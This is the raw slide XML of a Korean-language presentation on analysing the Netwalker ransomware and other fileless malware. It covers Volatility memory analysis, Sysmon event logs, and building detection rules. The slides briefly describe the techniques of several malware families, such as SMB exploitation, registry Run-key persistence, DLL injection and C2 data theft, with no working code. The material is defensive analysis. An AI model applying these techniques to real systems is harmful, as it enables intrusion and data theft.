                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>결과</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9217" name="_x364003936">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B703ADC2-3060-443B-99BD-413D660309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33" b="29626"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1100376" y="8492020"/>
            <a:ext cx="9677400" cy="6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_x364003936">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38069C8-EA3F-4159-BEEB-C5EA9FC7AE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0" t="30039" b="15902"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2827576" y="9093008"/>
            <a:ext cx="10427958" cy="43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A744E0C-686A-43CA-A12F-57A6D06EC444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947976" y="8964125"/>
            <a:ext cx="1905000" cy="1593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8C24CA-8C88-4FC1-8EE4-A4FA045D4B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="5295712"/>
            <a:ext cx="16078199" cy="613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kern="0" spc="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powershell</a:t>
            </a:r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(3356, 2212) : Netwalker.ps1</a:t>
            </a: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가 실행시킨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" kern="0" spc="0" dirty="0" err="1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powershell</a:t>
            </a:r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 </a:t>
            </a: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프로세스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</a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="순서도: 수행의 시작/종료 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23321DAC-299A-40B6-8756-E67EEE1899CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763492" y="2788671"/>
            <a:ext cx="2851484" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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+mn-ea"/>
              <a:cs typeface="Calibri"/>
              <a:sym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80AB5D-8D30-462E-91F4-1C3FE6F41E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3919030" y="2947242"/>
            <a:ext cx="9336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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>volatility &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>pstree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>결과</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="_x363999536">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86EEFF00-329E-4CF5-8C34-1BBCD168B6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45" r="11867" b="31794"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1064281" y="4105332"/>
            <a:ext cx="15370779" cy="96769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645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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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pic>
        <p:nvPicPr>
          <p:cNvPr id="6145" name="_x364000896">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68D87BC3-8C89-414A-9138-0A62D619F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53" y="3380830"/>
            <a:ext cx="11448082" cy="552886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_x363999456">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73D5836-8201-4C83-97A2-49C7BF181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651" y="3086100"/>
            <a:ext cx="9231696" cy="66103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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E9EB891-04A7-400B-8362-221373A9E5E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Netwalker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="순서도: 수행의 시작/종료 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E83E260-AC0C-4518-AE4E-1CE444C671F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763492" y="2340837"/>
            <a:ext cx="2851484" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Event</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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+mn-ea"/>
              <a:cs typeface="Calibri"/>
              <a:sym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448E39-1C35-4B12-9F55-61CD2A97AC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3919030" y="2499408"/>
            <a:ext cx="9336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 err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
              </a:rPr>
              <a:t> event log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179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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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1D6418B7-9366-4169-A585-E4363CD159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65"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="763492" y="3162300"/>
            <a:ext cx="14623255" cy="6477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8D62A54-3B60-495E-B958-F7BCD3D507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8" t="49863" b="10555"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6146132" y="4307305"/>
            <a:ext cx="11853884" cy="51174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Object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D8A826E-7591-4A02-829B-C827B4021EAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Netwalker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="순서도: 수행의 시작/종료 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6431E24-976A-4238-B6BB-04B056AEE652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763492" y="2340837"/>
            <a:ext cx="2851484" cy="650658"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6A6A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에스코어 드림 4 Regular"/>
                <a:ea typeface="에스코어 드림 4 Regular"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Real-time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="18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188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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>악성코드 분석</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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33531F-B6BB-43CB-BD6B-7E24E0298811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799587" y="2428043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altLang="ko-KR" sz="2800" b="1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Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="28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악성코드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="28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Intelligence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="28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수집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056DD2-1BC2-42E9-A01E-377317500323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1238360" y="3401437"/>
            <a:ext cx="1569720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Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1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관련 악성코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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 보안 취약점을 이용한 공격이라고 불리며 흔히 말하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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취약점</a:t>
            </a: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sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic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wannamine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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WannaCry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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의 변종으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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취약점을 공략하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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WMI, ADMIN$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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공유 폴더 등을 통해 확산되며 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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를 통한 원격지 서비스 등록 및 구동하는 방식을 사용</a:t>
            </a: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sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic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kovter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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 자동 실행 레지스트리 항목에 악성 스크립트를 추가하는 파일리스 기법을 이용</a:t>
            </a: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sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic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netwire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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altLang="ko-KR" sz="2400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RAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="24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원격 액세스 트로이 목마</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="24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로 감염된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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PC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="24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를 제어하며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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sz="24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정상 프로세스를 감염시켜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="24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C2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="24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서버에 연결</a:t>
            </a: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sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic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powerghost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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Computing resource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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를 사용하여 암호화폐를 생성하고 채굴함으로써 장치 성능이 현저히 저하되고 마모가 빠르게 진행</a:t>
            </a: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sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic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Powelik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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 초기 파일리스 기법을 적용한 악성코드이며 레지스트리 폴더 중 하나인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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폴더에서 스크립트를 단계적으로 실행시켜 최종적으로 실행되면 프로세스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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DLL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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의 코드를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0" err="1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인젝션</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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 하여 사용자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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정보를 특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400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C&amp;C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400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서버로 전송하는 악성 행위</a:t>
            </a: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sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic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8AC3A3A-224D-4D5B-9338-97AC0BE052A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12649200" y="1082365"/>
            <a:ext cx="4129508" cy="1614908"/>
            <a:chOff x="10896600" y="1668802"/>
            <a:chExt cx="4129508" cy="1614908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0B70276-2DED-4DB0-9314-D78BFDABC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6600" y="1668802"/>
              <a:ext cx="1614907" cy="1614907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FBE13CDC-C600-4EC8-8D2B-C7BFA5EA5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11200" y="1668802"/>
              <a:ext cx="1614908" cy="1614908"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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6388B874-2FBC-45F6-95CC-44121F7D3BE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="31" idx="3"/>
              <a:endCxn id="32" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12511507" y="2476256"/>
              <a:ext cx="899693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2530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A0D7611-0582-469A-9A00-68AD82AA08C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1840165" y="5143500"/>
            <a:ext cx="6495720" cy="28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0" cap="none" spc="-100" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F94858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4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Using Analysis Result  </a:t>
            </a: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0" cap="none" spc="-10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4 Regular"/>
                <a:cs typeface="에스코어 드림 6" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>into Detect Tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 17" descr="그리기이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB93BED6-7CE1-4577-8606-1A01E26AA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274" y="5143500"/>
            <a:ext cx="3159561" cy="3323859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="직각 삼각형 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F237A5D5-9D09-4B12-B676-12B6CAF6D81B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="-196646" y="-36873"/>
            <a:ext cx="12954001" cy="2208572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각 삼각형 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{674F7726-1A2F-4D56-9D40-E16D63FF3B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="-196646" y="-38100"/>
            <a:ext cx="12617245" cy="1143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4813FDF1-70CC-4415-AD33-C57B8DB4D830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="-196645" y="-38100"/>
            <a:ext cx="12649200" cy="420329"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangle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5194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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Event Analysis : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5400" kern="0" spc="-200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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8775CC-CE97-49B7-8D6B-03FF6F163153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1504323" y="4256816"/>
            <a:ext cx="13030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/>
              <a:t>이벤트 로그 데이터들 중</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>행위를 탐지할 수 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0"/>
              <a:t>Rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>제작 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A8F883A-FFD7-42AE-B2AE-0C974FAA4EBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1504323" y="5261908"/>
            <a:ext cx="3650315" cy="2405869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1A30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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Event ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>필터링</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="0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ysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>및 이벤트 수집</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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A3A2755-D6D2-462D-BF95-5E806E150B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6806463" y="5261908"/>
